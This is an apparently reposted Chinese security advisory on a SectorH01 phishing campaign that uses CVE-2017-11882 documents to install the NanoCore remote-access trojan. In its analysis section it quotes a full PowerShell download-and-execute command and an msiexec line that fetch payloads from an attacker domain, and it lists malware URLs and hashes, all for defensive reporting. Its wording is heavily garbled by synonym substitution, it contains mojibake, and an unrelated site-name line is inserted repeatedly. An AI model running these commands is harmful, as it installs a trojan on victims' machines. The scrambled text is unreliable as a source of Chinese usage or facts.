首页 > 安全钻研 > 安全传递 > 安全公告

SectorH01攻击组织垂钓邮件事务安全公告

颁布功夫 2019-09-22

事务布景

近期检测到SectorH01攻击组织“商贸信”垂钓邮件攻击在9月出现新一轮增长。在这次攻击中，黑客精心机关的带有office公式编纂器缝隙CVE-2017-11882或宏代码的恶意文档，将其作为附件批量发送至表贸行业企业邮箱中，在其打开文档中招后植入远控木马NanoCore进行机密信息窃取和远程节造，本次攻击顶峰时期每天成功投递超3000个邮件地址。

事务描述

通过溯源分析，我们发现黑客疑似使用一款名为“****邮件群发器”的软件进行邮箱地址采集和邮件批量投递。据测算，该软件拥有5000个/幼时的邮箱地址采集能力，并且在发件时能够自动更换代理IP，已被黑客利用于针对对表贸企业的“自动化”攻击。部门受攻击企业如下：

宝运莱·(中国区)最新官方网站

凭据统计数据，有超过1000家企业受到这次攻击影响，其中近一半以上散布在广东、江苏、浙江和上海四地，其中广东占比超过30%。出格是广东丽江和汉中由于造作业和表贸行业密集，成为本次攻击受害最严沉的区域。

宝运莱·(中国区)最新官方网站

从行业散布来看，“商贸信”攻击指标重要集中在工业造作及业务行业。统计数据显示，被攻击的88%为造作业，渣滓12%是与造作业提供有关联的销售、运输、商务服务行业。

宝运莱·(中国区)最新官方网站

事务分析

垂钓邮件重要通过伪造以下发件邮箱进行发送，其中使用最多的为

kieth@sdgtrading.co.uk
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

以其中一封邮件为例，从邮件头部信息中能够看到发件报答“Keith Ward/SDG /UK”，发件邮箱地址为kieth@sdgtrading.co.uk。sdgtrading是一家总部位于英国的进出口业务公司，目前打开该公司官方网站能够正常接见。

打开网站的contact-us页面我们发现有一个职务为UK & European Sales(英国及欧洲地域销售)的人员联系方式为keith@sdgtrading.co.uk，而这正是垂钓邮件发件邮箱(有两个字母地位互换)。我们揣摩攻击者可能通过爬取或者人为网络的方式获取了该业务公司的邮件地址，而后假装成该公司的销售人员发送垂钓邮件进行攻击。

宝运莱·(中国区)最新官方网站

垂钓邮件发件人信息

宝运莱·(中国区)最新官方网站

业务公司销售人员信息

垂钓邮件

邮件内容是关于业务订单确认和价值征询。邮件表述中高频出现出现以下词句：
“订购”、“价值”、“价目表”、“销售前提”、“折扣”、“装运日期”、“采购规格”等。

宝运莱·(中国区)最新官方网站

邮件中还指出邮件附件中蕴含“想要采购的产品条款”文档，请阅读后进行回复，部门文档名如下：

RFQ0591403-SDG.doc

RFQ015770082.doc

分析发现，附件文档中蕴含Office公式编纂器缝隙CVE-2017-11882利用代码或恶意宏代码，经过缝隙攻击或宏代码执行过程，会触发用于下载木马的Powershell号令执行，进一步下载木马：

'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'

除了利用Powershell，还有部门攻击中使用Windows装置法式(msiexec.exe)装置MSI包文件进行木马下载：

msiEXEc /i http[:]//oppofile.duckdns.org/d/dar.msi

从目前捕获到的攻击文档中我们发现有以下木马下载地址：

hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi

远控木马

被下载植入的现实上是的经过混合的远控木马NanoCore，NanoCore是使用.Net说话编写的职能壮大的远程接见节造木马（RAT），能够在指标主机上进行文件操作，屏幕节造，运行指定法式，还支持插件扩大职能，被习染NanoCore木马的电脑会出现严沉信息泄露，攻击者还能够利用中毒电脑为跳板，对指标网络持续进行渗入入侵。

主题�？楸患用芎笠晕煌继迨奖Ａ粼谧试次募�

“tewo3zFRzUGateK2dRRrbMo6Wdh7BawEbNw3whpXsTZfWwZYJ5X2aQTf2rHJrHGpTdCgwV16xL12y4YmEZj1nol5xVq6OWJTNPKhhTT3tBIWOAi7IjgznVXv3N2fC3b2wvrYdjp6hvBPP0bLGemkdbuwNcxmAjipQGmsISXkujt”中

宝运莱·(中国区)最新官方网站

从资源中获取到数据后，经过屡次解密得到最终的PE文件，而后将其Load到内存，并跳转到入口地位执行。

宝运莱·(中国区)最新官方网站

最终执行的NanoCore木马职能壮大，可执行各类恶意操作，如文件操作，注册表编纂，过程节造，文件传输，远程号令执行，键盘纪录等。以下为该木马节造端界面：

宝运莱·(中国区)最新官方网站

群发软件

通过排查，发现了一个名为“***\邮件群发器.exe”的可疑法式，使用该可疑文件名中的“***邮件群发器”关键字进行搜索，发现了这款名为****的邮件群发器软件。该软件拥有从网络上批量爬取邮箱地址，并针对获得的邮箱进行批量发送指定邮件的职能。

宝运莱·(中国区)最新官方网站

我们下载该软件，并进行注册和试用。凭据其界面展示的职能，只需编写好邮件内容(肆意填写发件人姓名)、批量增长收件人地址、点击“起头群发”三步，即可将邮件急剧发送至大批的指标邮箱中。

该软件还支持查看群发了局，若是有发送失败的情况，能够一键沉发。发送时还能够选择自动更换代理IP，这在肯定水平上能够暗藏真实发件IP。

宝运莱·(中国区)最新官方网站

该软件还有一个沉要的职能是，支持从指定网站采集指标邮箱。该职能页面默认的源网站地址为http[:]//www.****.biz/。我们尝试使用该网站进行邮箱采集，在10分钟之内能够采集到近800个邮箱地址，换算后一个幼时之内能够采集到5000个邮箱，而这些被采集到的邮箱都存在被攻击的可能。

宝运莱·(中国区)最新官方网站

能够看到这个默认的邮箱采集网站“**网”(www.*****.biz)是一个业务信息颁布平台，大量厂商(机械、化工、电气、能源、仪器等行业)在该网站上颁布等各类产品的供给或求购信息。而每一条信息城市附带厂商的电话、邮编、邮箱等联系方式，“****邮件群发器」佚是从这些信息中获取了大量的邮箱地址。

宝运莱·(中国区)最新官方网站

攻击思路

从以下几个角度，我们以为黑客使用了邮件群发软件“****邮件群发器”进行辅助攻击：

1、群发软件“****”有近期接见发件人IP的纪录；
2、受害企衣粪型与“****邮件群发器”默认采集邮箱类型一致(工业品业务公司)；
3、攻击的影响领域与该软件的采集能力吻合(受害邮箱约3000个/日 & 软件的采集能力约5000个/幼时)。
揣摩黑客执行攻击的思路如下：
1、黑客下载邮件群发软件；
2、机关带有CVE-2017-11882缝隙利用(或者宏代码)的office恶意文件；
3、使用****邮件群发器从业务分类信息网站批量采集指标邮箱地址；
4、使用筹备好的恶意文档作为附件，机关垂钓邮件并批量发送；
5、期待收件人打开附件并中招，通过远控木马NanoCore对指标进行远程节造。

宝运莱·(中国区)最新官方网站

总结

在这次攻击事务中能够发现，黑客与灰产从业人员出现了交集�；也嗽笨⒊鲇始悍⒐ぞ�，工具可针对网站上的公开邮箱进行爬取，可利用获取到的邮箱进行批量群发邮件。工具在其注册的“官网”上进行公开售卖，使用注明钟装正义”地提到“仅用于正规邮件营销，滥用者后果得意”。但工具一旦售出，便难以保障被用于合法用处。

而黑客获得此软件后，将其纳入攻击兵器中的一员。随后，只需编写好木马，机关垂钓邮件，就能够利用该工具将垂钓邮件自动化、大批量地发送至企业的有关邮箱中。

建复建议

1、企业邮箱网管将以下发件邮箱设置为黑名单

kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

2、不要打开不明起源的邮件附件，对于附件中的文件要审慎运行，如发现有剧本或其他可执行文件可先使用杀毒软件进行扫描；

3、升级office系列软件到最新版本，实时建复office法式缝隙，不要轻易运行不成信文档中的宏；

4、推荐部署终端安全治理系统防御病毒木马攻击；

5、使用入侵检测系统检测未知黑客的各类可疑攻击行为。

IOC

邮箱

kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in

邮件附件

fec34e9741abedea7f0a4fa991bdc618
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905

a9958884c16f17c2c9e4d75f92117352

NanaCore木马

2c7885159feae6ebde634418591ad276

453a235ad5ea7055f2af2c51c95a5bb2

域名

oppofile.duckdns.org

URL

hxxp://oppofile.duckdns.org/e/gmb.msi

参考链接

https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/

7*24幼时服务热线

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合多数据书生电子云子可信

司法申明

宝运莱官方网站

网络安全防护

网络安全检测

利用安全

数据安全

安全治理

云安全

工控安全

移动及终端安全

密码利用安全

大模型利用安全

专业安全服务

安全运营中心

知白学院

威胁谍报中心

安全传递

钻研汇报

安全团队

渠路系统

售后服务

升级布告

软件升级

公司概况

新闻动态

技术专题

人才招聘

投资者关系

资源中心

联系宝运莱官方网站

安全钻研

SectorH01攻击组织垂钓邮件事务安全公告

关于宝运莱官方网站

解决规划

安全钻研

联系宝运莱官方网站

7*24幼时服务热线